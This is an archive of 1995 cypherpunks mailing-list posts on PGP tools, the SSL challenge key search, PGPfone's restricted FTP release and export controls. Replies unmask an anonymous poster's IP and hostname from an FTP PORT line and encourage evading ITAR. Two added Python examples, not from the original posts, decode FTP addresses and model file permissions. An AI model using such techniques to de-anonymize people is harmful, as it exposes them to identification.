O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Fri, 25 Aug 95 19:41:46 PDT
To: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Subject: Re: Auto-pgp for pine/elm/tin (fwd)
In-Reply-To: <199508260212.UAA27830@nagina.cs.colorado.edu>
Message-ID: <Pine.BSI.3.91.950825211846.8551A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 25 Aug 1995, Bryce Wilcox wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > I have PGP installed on my pc and if I want to 
> > use it, I can save the message in ascii, then upload it to the server 
> > where I have my Internet account, then mail it.
> 
> 
> I use PGP on every outgoing message and about 20% of incoming messages.  And
> I send/receive a *lot* of messages.  No way I would be able to do a process 
> like the above on my mail.
> 
> 
> In a few weeks I will be able to get mail on my home computer, but most
> (80%?) Internet users will still not have that luxury.

Is that assumption based on the fact that most inet users are using
shell accounts?  Using a PPP or SLIP dialup and managing your mail
locally using POP is pretty easy.  Clients like Private Idaho
and PGPclip then make the PGP transition painless.

Here at USIS, we have 305 entries in the password file.  Subtract
10 entries for system accounts (root, news, majordomo, bin, etc)
Now of the entries left 80 are PPP, 48 SLIP.  There are shell
accounts for each slip/ppp user, thus we have 39 people left over
who are shell only.  So, 70% of our users have the ability to locally
manage and pgp encrypt mail.

Now that winblows 95 is out and ppp dialup into the i-net
is point and gruntable, I expect this disparity to worsen.

Why learn icky unix commands when you can follow some simple
instructions and have ras up and running ppp in 10 minutes?
Since people will _already_ be using windows mail interfaces,
the transition to PGP will be quick and painless.  Hell, I
hear the latest version of Eudora has it integrated.




David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Fri, 25 Aug 95 13:42:22 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
Message-ID: <199508252041.VAA01686@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I've had a power down and had to shutdown most machines. On coming back
decided to update the versions of brloop and brclient...

Now I'm trying to run on AXP/OSF/1 and MIPS/Ultrix machines the latest
versions and don't seem to be able to get a damn piece of keyspace...

Besides many timeouts I also get

Server timing problem: Goodbye unknown -- you have been timed out

which I assume is a message from the server telling me it's too loaded,
and

No input when expecting an ACK line

which sounds even worse... I've been having trouble getting keys all the
afternoon now, what a pity.

BTW, the versions I'm running now are brloop 0.05 and brclient 0.16 and
since I'm in Cambridgeshire-UK too, with a 2Mbps link, I doubt that the
timeout is due to congestion on the net.

Any suggestions? Or is it only the overload in the server that's giving
me nightmares?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Fri, 25 Aug 95 18:53:06 PDT
To: hfarkas@ims.advantis.com
Subject: Auto-pgp for pine/elm/tin (fwd)
Message-ID: <Pine.3.89.9508252137.H2413-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



In Garfinkel's book, he talks about the risks of running PGP on a 
multiuser system where others (sys. admins, eg) have higher levels of 
authority than you do.  I have PGP installed on my pc and if I want to 
use it, I can save the message in ascii, then upload it to the server 
where I have my Internet account, then mail it.  Maybe not entirely 
transparent, but at least it seems to me that the convenience of running 
it on the server with something like Mr. Wilcox's BAP is not worth the 
added risk.  Besides, how often do you need to use it?  
--
pjp

---------- Forwarded message ----------
Date: Fri, 25 Aug 1995 12:03:52 -0400 (EDT)
From: Henry W. Farkas <hfarkas@ims.advantis.com>
To: cypherpunks@toad.com
Subject: Auto-pgp for pine/elm/tin

-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> ________________________________________________________________________
> Sameer Manek                Seawolf@challenger.atc.fhda.edu         
> ________________________________________________________________________

- ------------------------------------------------------------------------

Yes, it exists, and I'm using it now.  I've tried competing products and 
found this to be the cleanest, smoothest and easiest to install.  I have 
no personal, commercial or financial interest in this product.   It does 
"auto-pgp" for pine, elm and tin.  

 ***********************************************************************
 *  BAP v.1.01                                                         *
 *  Written August 1995 by Bryce Wilcox                                * 
 *  e-mail: <bryce.wilcox@colorado.edu>                                *
 *  PGP key id: <617C6DB9>                                             *
 *  snail mail: <2228 Canyon Blvd, Apt. 1E, Boulder, CO, 80302>        *
 *  URL: <http://cs.colorado.edu/~wilcoxb/home.html>                   *
 *  BETA TEST VERSION!  DO NOT DISTRIBUTE!                             *
 * (Note that documentation, among other things, is still unfinished.) *
 ***********************************************************************

I also found the author responsive to my comments and suggestions.
Just please do *-NOT-* put your pass phrase in a cleartext file!

- ------------------------------------------------------------------------

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMD30WaDthkLkvrK9AQF6sQP/fVen7ZI4DbgC14y+NPdZYOjaRQ9/jQNT
d4StD638OoBRkO7b8efiTd/rNULwuzSPKDiplKwRdE8Bboh4FdSWYvz6wfqgNJcd
D3imouQcEt+erjEC2H5haQyZwBHeNNR9mTYhkzoBt4+jMqsRCECduaExyHUOTWFj
euOkRqTJ0l4=
=2q74
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 14:02:25 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: ssl challenge
In-Reply-To: <199508251929.OAA15415@arnet.arn.net>
Message-ID: <"swan.cl.cam.:178620:950825210158"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>         > option to output results to a file (or files, so we can maintain
> local logging of results: ie, CHAL2a.dat, CHAL2b.dat, etc).

Done -- in brl0.06

The whole code runs without writing any files, so it defaults to /dev/null,
but you can point it where you like (e.g. logkeys=log-`uname -n`)

>         > a Windows 3.1 variant (or even win32s)

Not my area ....

> Maybe next challenge, we can pre-allocate keyspace based on the results of
> this one: look at how fast folks are reporting results, and allocate chunks
> of space accordingly (maybe based on an 8-hour 'cycle'). Sure take some of
> the load off the poor server :-)

It would seem reasonable to allocate say "2/3rds of what you scanned last time"
in advance ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 14:52:29 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: Cypherpunk Brute Squad [Re: SSL Challenge: Server problems]
In-Reply-To: <199508252041.VAA01686@neptune.ebi.ac.uk>
Message-ID: <"swan.cl.cam.:196070:950825215208"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Server timing problem: Goodbye unknown -- you have been timed out
> which I assume is a message from the server telling me it's too loaded,

No -- it means that you were taking too long to respond, so it timed you out.

> No input when expecting an ACK line
> which sounds even worse... I've been having trouble getting keys all the
> afternoon now, what a pity.

brclient -k failed to get any keys, so brutessl didn't generate any output,
so brclient -A didn't get any input :-(

Latest brloop should avoid this by not calling brutessl if brclient -k failed
and also not calling brclient -A if brutessl didn't run / failed.

> BTW, the versions I'm running now are brloop 0.05 and brclient 0.16 and
> since I'm in Cambridgeshire-UK too, with a 2Mbps link, I doubt that the
> timeout is due to congestion on the net.

Well, the problem with brclient 0.16 was that a "go faster" stripe made it
go *too* fast if local, perl loses data, so it times out :-((

> Any suggestions? Or is it only the overload in the server that's giving
> me nightmares?

Kind of -- slow clients hogging the single threaded (idle) server :-((




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 25 Aug 95 19:58:28 PDT
To: cypherpunks@toad.com
Subject: Auto-PGP for OS/2
Message-ID: <199508260258.AA11781@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



A few weeks ago, someone anonymously posted a uuencoded version of an
add-on to the OS/2 System Editor that claimed to automatically use PGP
to encrypt and/or sign ASCII documents.  However, when I uudecoded it
with several different versions of uudecode, all I got was garbage.  I
sent mail to the poster's anon.penet.fi address, but didn't get a
response.
	Did anyone manage to get a clean file or know where I can FTP it? 
Thanks.
					Dan
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 25 Aug 95 14:55:24 PDT
To: cypherpunks@toad.com
Subject: Wide Release (Re: PGPfone (BETA TEST) is released)
Message-ID: <199508252155.XAA06116@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


ftp host: net-dist.mit.edu, AKA bitsy.mit.edu

220 bitsy FTP server (Version wu-2.4(1) Thu Apr 14 20:21:35 EDT 1994) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS *****
230-Welcome, archive user!  This is an experimental FTP server.  If have any
230-unusual problems, please report them via e-mail to ftp-bugs@bitsy
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230-Please read the file README
230-  it was last modified on Sat May 28 19:19:36 1988 - 2643 days ago
230 Guest login ok, access restrictions apply.
PWD
257 "/" is current directory.
MACB E
500 'MACB E': command not understood.
TYPE A
200 Type set to A.

CWD /pub/PGPfone
250-Please read the file README
250-  it was last modified on Fri Aug 25 15:52:05 1995 - 0 days ago
250 CWD command successful.
PORT 199,117,100,36,7,146
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 29
-r--r--r--  1 0        1001         4287 Aug 25 15:52 README
drwxr-x---  4 1        27            512 Aug 25 17:00 dist
-r--r--r--  1 0        1001         2172 Aug 24 22:02 mitlicen.txt
-r--r--r--  1 0        1001        19546 Aug 24 23:43 rsalicen.txt
226 Transfer complete.

CWD /pub/PGPfone/dist
250 CWD command successful.
PORT 199,117,100,36,4,177
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 2
drwxr-xr-x  2 435      27            512 Aug 25 15:24 U.S.-only-XXXX
drwxrwxr-x  2 0        27            512 Aug 25 15:13 secret99
226 Transfer complete.

CWD /pub/PGPfone/dist/secret99
250 CWD command successful.
PORT 199,117,100,36,7,178
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 2271
-r--r--r--  1 0        27         764444 Aug 25 15:12 PGPfone10.sea.Hqx
-r--r--r--  1 0        27         751220 Aug 25 12:50 PGPfone10.sea.Hqx.OLD
-r--r--r--  1 0        27         750964 Aug 24 23:30 PGPfone10.sea.Hqx.OLDER
-r--r--r--  1 0        27           2172 Aug 24 22:02 mitlicen.txt
-r--r--r--  1 0        27          19546 Aug 24 23:43 rsalicen.txt
226 Transfer complete.

CWD /pub/PGPfone/dist/U.S.-only-XXXX
250 CWD command successful.
PORT 199,117,100,36,6,161
200 PORT command successful.
LIST
150 Opening ASCII mode data connection for /bin/ls.
total 760
-r--r--r--  1 0        27         764444 Aug 25 15:12 PGPfone10.sea.Hqx
226 Transfer complete.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Fri, 25 Aug 95 22:12:08 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Florida Drivers Permits
In-Reply-To: <v02130506ac63e9ef8d55@[166.84.254.3]>
Message-ID: <Pine.BSI.3.91.950826000630.348B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 26 Aug 1995, Robert A. Rosenberg wrote:

> At 13:10 8/25/95, Jim Ray wrote:
> >Story doesn't say it, but it sounds like FL *may* be the first state to do
> >this. Are any other states doing this already?
> 
> NY has Photo Drivers Permits with Mag Strips on the back and Computer
> Generated Pictures (I've even seen them being created when I was on an
> assignment at the DMV office in Albany that creates them).

Minnesota has now been doing this for over a year. There's been a lot of 
trouble with it, but they have them. Mine is due any day, and it will
certainly come in contact with a magnet, upon my possession.

Love Always,

Carol Anne

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Fri, 25 Aug 95 22:00:17 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: Florida Drivers Permits
Message-ID: <v02130506ac63e9ef8d55@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:10 8/25/95, Jim Ray wrote:
>I saw the same story. The name, address, age, & height mentioned
>are already obvious on licenses, but this may preclude incorrect data entry
>by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
>on the digitized photo, but we could be looking at different stories.
>Phase-in in July, '96. The story I saw suggests that other data, such as
>tickets, criminal violations (presumably convictions) and "other
>biographical information" [welfare, credit info] could eventually be
>included, depending on FL's state budgetary considerations. No author,
>just "Associated Press," listed on the story, and the card uses a magnetic
>strip "like those on credit cards" rather than a chip, which may be a
>mistake [considering the renewal period & my experience with bank-cards].
>Story doesn't say it, but it sounds like FL *may* be the first state to do
>this. Are any other states doing this already?

NY has Photo Drivers Permits with Mag Strips on the back and Computer
Generated Pictures (I've even seen them being created when I was on an
assignment at the DMV office in Albany that creates them).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 26 Aug 95 01:26:50 PDT
To: cypherpunks
Subject: John Walker releases encrypting Speak Freely/Netfone
Message-ID: <9508260826.AA11577@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[John lives in Switzerland and renounced his US citizenship, so
there's no export issue...]

Date: Wed, 23 Aug 1995 07:14:10 -0400
Forwarded-by: farber@central.cis.upenn.edu (David Farber)

From: John Walker <kelvin@fourmilab.ch>
Subject: Free secure Internet voice communication

I've just released to the public domain Release 5 of Speak Freely for
Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
workstations.  Assuming you have a fast enough connection to the
Internet (with reasonably consistent packet delivery time) and/or a
fast enough CPU to perform audio compression in real time, you can
talk to anybody on Earth connected to the Internet who's also running
the program.  The Windows and Unix versions have entirely different
user interfaces, but can intercommunicate.  Complete source code is
available.

For communications security, IDEA, DES (less initial and final
permutations), and one-time pad (re-used for each sound packet)
encryption are available.  The intensely paranoid can enable any
combination of these.  The documentation explains how to use PGP to
securely exchange session keys before a conversation; an automatic
session key generator is provided.  DES is included for commercial
users who don't have a license to use the IDEA patent.  One-time pad
encryption is for those with machines too slow to run IDEA or DES in
real time.

I didn't include a public key mechanism because I wanted to avoid all
the confusion.  If somebody wants to navigate the narrow strait
between the RSA patent Scylla and Charybdis of export controls, the
programming work to implement public keys is straightforward and the
source code is yours to hack.

For further information, see:

    http://www.fourmilab.ch/netfone/windows/speak_freely.html

which describes the Windows version in detail and contains pointers to
the Sun and SGI editions, as well as links to download source code and
a ready-to-run executable for Windows.  You can also obtain the
program by anonymous binary FTP:

Unix source code:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz

Windows executable:
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip

Windows source code (for Visual C 1.5):
    ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip

The Sun and SGI versions of this program are quite stable, and should
work for just about anybody with an adequate network connection.
Porting the code to other Unix workstations with audio hardware should
be relatively straightforward.  The Windows version has just been
finished and until it's shaken down on a variety of machines,
networks, sound cards, etc. may not work for everybody.

The Windows version requires a sound card with Windows Multimedia
drivers (I've tested it on a variety of Sound Blasters of various
generations) and a TCP/IP stack that supports WINSOCK (I'm using
NetManage Chameleon NFS).  Since multimedia and network hardware and
drivers vary tremendously from machine to machine, I wouldn't be
surprised if some tweaking were needed for various configurations.
The CPU speed required interacts with the speed of your network
connection; if you have a high-bandwidth connection to the Internet,
or you're talking to another person on a high-speed LAN, there's no
need to compress sound and the CPU load is minimal; just about any
machine will do.  If you need to compress in order to squeeze 8000
samples per second into a dial-up connection, then you need a CPU fast
enough to run GSM compression in real time: basically we're talking a
very fast 486 or Pentium.  If you turn on IDEA and/or DES encryption,
that also consumes CPU time.

Based on my experience with other Windows programs, it will probably
take months to track down misbehaviour due to strange hardware and
software configurations.  Complete, detailed bug reports are welcome.
I may not be able to respond individually, but the Web page will track
updates as they're released.  I have tested the program only on
vanilla 16 bit Windows 3.1.

The Windows version contains preliminary code to support direct
dial-up modem connections, acting as a phone scrambler.  Serial port
support in most Windows machines is so poor (unless you have a 16550A
UART and appropriate drivers, which most people don't) that this
feature isn't usable at present.  I've left the code in just in case
somebody with suitable hardware wants to bash it into working form.

If you add features, port the program to 32 bits, fix bugs, etc., let
me know so I can make your contributions generally available.

--------------------  <http://www.fourmilab.ch/>  -------------------
John Walker                      | A sufficiently advanced
Internet: kelvin@fourmilab.ch    | technology is indistinguishable
                                 | from a rigged demo.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 26 Aug 95 04:28:52 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <199508252155.XAA06116@utopia.hacktic.nl>
Message-ID: <199508261129.HAA22154@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


> ftp host: net-dist.mit.edu, AKA bitsy.mit.edu
> 
> 220 bitsy FTP server (Version wu-2.4(1) Thu Apr 14 20:21:35 EDT 1994) ready.
> USER ftp
> 331 Guest login ok, send your complete e-mail address as password.
> PASS *****

The fact that it uses exactly 5 *'s, and the MACB E command below indicate 
this was probably an Anarchie transcript, a ftp/archie client for the Mac.

> PWD
> 257 "/" is current directory.
> MACB E
> 500 'MACB E': command not understood.
> TYPE A
> 200 Type set to A.
> 
> CWD /pub/PGPfone
> 250-Please read the file README
> 250-  it was last modified on Fri Aug 25 15:52:05 1995 - 0 days ago
> 250 CWD command successful.
> PORT 199,117,100,36,7,146

Too bad "Anonymous" isn't more aware of the FTP protocol.  This indicates that 
the connection was made from 199.117.100.36, p36.Boulder-2.dialup.csn.net.

> 200 PORT command successful.
> LIST
> 150 Opening ASCII mode data connection for /bin/ls.
> total 29
> -r--r--r--  1 0        1001         4287 Aug 25 15:52 README
> drwxr-x---  4 1        27            512 Aug 25 17:00 dist
> -r--r--r--  1 0        1001         2172 Aug 24 22:02 mitlicen.txt
> -r--r--r--  1 0        1001        19546 Aug 24 23:43 rsalicen.txt
> 226 Transfer complete.
> 
> CWD /pub/PGPfone/dist
> 250 CWD command successful.

This indicates "Anonymous" is either making up everything from this point on, 
or has access to the machine other than normal anonymous FTP.  The permissions 
on dist would prevent the CWD from happening.  Actually, the permissions on 
dist prevent this from working at all.

Look, if you want to make PGPfone available overseas in violation of ITAR, go 
ahead.  It's a stupid law, and you aren't likely to get caught.  But don't 
make MIT or Phil the fall guy for it.  Send it out yourself.  MIT and Phil 
have contributed greatly to the privacy community, and stupid stunts like this 
aren't going to encourage them much.

Bob
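
The PORT observation in the message above, as an added example that is not part of the original post: a pre-posting check that decodes the RFC 959 host-port fields in an FTP transcript and blanks them before the transcript is shared. The PORT lines in SAMPLE are taken from the transcript quoted in this thread; the 227 line and its 192.0.2.10 address are constructed, and the function names are this example's own.

```python
import re

# Six comma-separated decimal bytes: h1,h2,h3,h4,p1,p2 (RFC 959 host-port).
HOSTPORT = r"(?<![\d,])(\d{1,3}(?:,\d{1,3}){5})(?![\d,])"
# Optional "> " quoting lets this run on transcripts pasted into mail replies.
QUOTE = r"^\s*(?:>\s*)*"
# PORT is sent by the client and carries the client's own address.
PORT_CMD = re.compile(QUOTE + r"PORT\s+" + HOSTPORT + r"\s*$", re.IGNORECASE)
# A 227 reply to PASV carries the server's address in the same encoding.
PASV_REPLY = re.compile(QUOTE + r"227[ -].*?" + HOSTPORT)

# Lines 1-7 come from the transcript in this thread; line 8 is constructed.
SAMPLE = """\
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS *****
CWD /pub/PGPfone
PORT 199,117,100,36,7,146
200 PORT command successful.
> PORT 199,117,100,36,4,177
227 Entering Passive Mode (192,0,2,10,19,137)
"""


def decode_hostport(text):
    """Turn 'h1,h2,h3,h4,p1,p2' into (dotted_ip, port)."""
    fields = [int(f) for f in text.split(",")]
    if len(fields) != 6 or any(f > 255 for f in fields):
        raise ValueError("not a valid host-port: %r" % text)
    ip = ".".join(str(f) for f in fields[:4])
    # The port is sent as two bytes, high byte first.
    return ip, fields[4] * 256 + fields[5]


def find_disclosures(transcript):
    """Return (line_number, 'client'|'server', ip, port) for each address."""
    found = []
    for number, line in enumerate(transcript.splitlines(), start=1):
        for kind, pattern in (("client", PORT_CMD), ("server", PASV_REPLY)):
            match = pattern.search(line)
            if not match:
                continue
            try:
                ip, port = decode_hostport(match.group(1))
            except ValueError:
                continue  # six numbers, but not all of them are bytes
            found.append((number, kind, ip, port))
    return found


def redact(transcript, placeholder="x,x,x,x,x,x"):
    """Blank the host-port field on every PORT command and 227 reply."""
    out = []
    for line in transcript.splitlines():
        for pattern in (PORT_CMD, PASV_REPLY):
            match = pattern.search(line)
            if match:
                start, end = match.span(1)
                line = line[:start] + placeholder + line[end:]
                break
        out.append(line)
    return "\n".join(out)


if __name__ == "__main__":
    for hit in find_disclosures(SAMPLE):
        print("line %d discloses %s address %s port %d" % hit)
    print(redact(SAMPLE))
```
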





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sat, 26 Aug 95 06:49:02 PDT
To: cypherpunks@toad.com
Subject: Re: Wide Release (Re: PGPfone (BETA TEST) is released)
In-Reply-To: <m0smKvJ-000PZgC@bofh.lake.de>
Message-ID: <199508261349.JAA23170@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


cg@bofh.lake.de said:
> > This indicates "Anonymous" is either making up everything from this 
> point on,  or has access to the machine other than normal anonymous 
> FTP.  The permissions  on dist would prevent the CWD from happening.  
> Actually, the permissions on  dist prevent this from working at all.  
> Wrong. The FTP daemon probably has a wrapper around it which checks 
> where the call comes from. When it thinks you come from the U.S. or 
> Canada, it probably starts up the FTP daemon in group 27, otherwise 
> in the default anonymous group. The idea is nice, but you have to 
> implement it correctly, of course. 

You appear to be correct.  I came in from a .net address, which MIT apparently 
feels is non-US, and they would be correct about some .net's, but that's true 
of .com and .edu as well.

I came in from a Multinational corporation in .com, and it let me in. :-)

> That's the dilemma: if you export it, you are taking the 
> risk they won't put up this kind of software for FTP the next time. 
> If you don't, you are  complying with these stupid laws... But 
> anyway, with the present state of the MIT FTP server, PGPfone is 
> likely to be all over the (non-US-and-Canada) place before the 
> weekend is over. 

But if people get it from MIT directly, then MIT is violating ITAR/DTR, and 
its lawyers would be justified in shutting things down.  If it's pulled down 
by a US citizen, and then sent out, I don't see how MIT could be held 
responsible for it.

Bob
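
The permission argument in this exchange, as an added example that is not part of the original posts: it applies the standard Unix owner/group/other check to the listing lines from the transcript to show which component stops a session and how membership of group 27 changes the result. The listing lines are copied from the thread; the session uid 14 and the default gid 50 are assumptions made for illustration, and the function names are this example's own.

```python
from collections import namedtuple

Entry = namedtuple("Entry", "mode uid gid name")

# Listing lines copied from the transcript in this thread (numeric ids).
LISTING = [
    "drwxr-x---  4 1        27            512 Aug 25 17:00 dist",
    "drwxrwxr-x  2 0        27            512 Aug 25 15:13 secret99",
    "-r--r--r--  1 0        27         764444 Aug 25 15:12 PGPfone10.sea.Hqx",
]

# Hypothetical session identities: the uid and the non-27 gid are assumptions.
ANON_UID = 14
DEFAULT_GIDS = {50}
US_GIDS = {27}


def parse_ls_line(line):
    """Parse one `ls -l` line with numeric owner and group, as in the thread."""
    fields = line.split(None, 8)
    if len(fields) != 9 or len(fields[0]) != 10:
        raise ValueError("unrecognised listing line: %r" % line)
    return Entry(fields[0], int(fields[2]), int(fields[3]), fields[8])


def applicable_bits(entry, uid, gids):
    """Pick the one rwx triplet Unix applies: owner, else group, else other."""
    if uid == entry.uid:
        return entry.mode[1:4]
    if entry.gid in gids:
        return entry.mode[4:7]
    return entry.mode[7:10]


def can_cwd(entry, uid, gids):
    """CWD needs search (execute) permission on the directory."""
    if entry.mode[0] != "d":
        return False
    # 's' and 't' in the third position mean execute plus setid/sticky.
    return uid == 0 or applicable_bits(entry, uid, gids)[2] in "xst"


def can_list(entry, uid, gids):
    """LIST needs read permission on the directory."""
    if entry.mode[0] != "d":
        return False
    return uid == 0 or applicable_bits(entry, uid, gids)[0] == "r"


def first_blocker(path, uid, gids):
    """Walk directories then a file; return the first name the session
    cannot pass, or None if the file at the end can be read."""
    for entry in path:
        if entry.mode[0] == "d":
            allowed = can_cwd(entry, uid, gids)
        else:
            allowed = uid == 0 or applicable_bits(entry, uid, gids)[0] == "r"
        if not allowed:
            return entry.name
    return None


if __name__ == "__main__":
    path = [parse_ls_line(line) for line in LISTING]
    for label, gids in (("default group", DEFAULT_GIDS), ("group 27", US_GIDS)):
        print(label, "->", first_blocker(path, ANON_UID, gids) or "file readable")
```
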





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 26 Aug 95 10:21:21 PDT
To: Peter F Cassidy <cypherpunks@toad.com
Subject: Modern Journalism (was: All about Bernstein)
Message-ID: <ac649c1e01021004bebc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


I've never met either Dan Bernstein or Peter Cassidy, but this raises an
issue of slight relevance to the themes of this list, at least the nexus of
publicity and journalism issues. You folks may have different views of this
trend toward journalistic puff pieces. As crypto issues reach public
visibility, and as things like the SSL breakage get reported, and as
digital money efforts reach fruition, I expect a lot more journalistic
coverage.

Sadly, I also expect most of the articles to be in the vein of the many
repetitive articles about Phil Zimmermann.

"The Soul of a New Journalist" meets "Manufacturing Drama" (apologies to
Kidder and Chomsky).

At 10:56 AM 8/25/95, Peter F Cassidy wrote:
>Folks,
>
>I'm the guy who authored an upcoming piece about Bernstein's law suit
>with the state department for WIRED. WIRED loves the piece but, in the
>style of popular mags, wants more personal stuff on Bernstein, who is
>super articulate about the science and law of crypto but super shy about
>his heroic self. (Guy wouldn't even disclose his age! Had to threaten to
>throw myself in front of a bus to get him to tell me he's from Long
>Island!) Editor thinks guy comes across as a ghost, not surprisingly. . .
>
>One fellow from the list, following up an appeal I made here for Friends
>of Bernstein to call me and tell me about the litigant's best qualities,
>I'd appreciate greatly hearing from again. He called when I'd pretty much
>passed deadline for manuscript delivery. I'm calling Dan again, but after
>one trip to Delphi, I dunno if the responses from the Oracle will be any
>more forthcoming.

We need to "Just say No!" to journalists asking for "more personal details"
to spice up their stories. No offense meant to Peter, who is apparently
just responding to editorial pressures, but this "personal journalism" is
getting tiresome. (Needless to say, "in my opinion." Your mileage may
vary.)

I no longer read the many puff pieces on Phil Zimmermann, for example, as
they all are seemingly in the same format: huge closeup photos of Phil's
face, crap about his peace activist days, personal anecdotes about his
battles with RSADSI, speculations about his possible indictment, etc. Utter
journalistic bullshit, Oprah style. I half expect Stone Phillips to attach
an Estes rocket engine to Phil to give the story more pizazz.

Instead of good "science reporting," we get "personality pieces." Instead
of explanations of crypto, of PGP, of the many important (and complicated!)
issues involving identity, key signing, "nymity," digital money, and the
implications of crypto anarchy, we get "People" magazine.

"In the next issue, computer hackers reveal the secrets of their special diets."

Granted, many people prefer personality stories. Fits with short attention
spans, with only the most casual interest in the subject. If you've never
heard of a prime number before, all you can get out of a story is where Dan
Bernstein grew up and why he became a scientist.

On a personal note, I provided almost no personal details to Steven Levy,
for a book he's reported to be writing. I think he'll confirm this, if he's
still reading this list. When he did the "Wired" piece a couple of years
ago (cover story on "Crypto Rebels," issue #2, or "1.2"), the few personal
details which crept in about us were (at least in my case) nearly the only
such details provided.

I kidded (not kiddered) Levy about the focus on "personalities" in modern
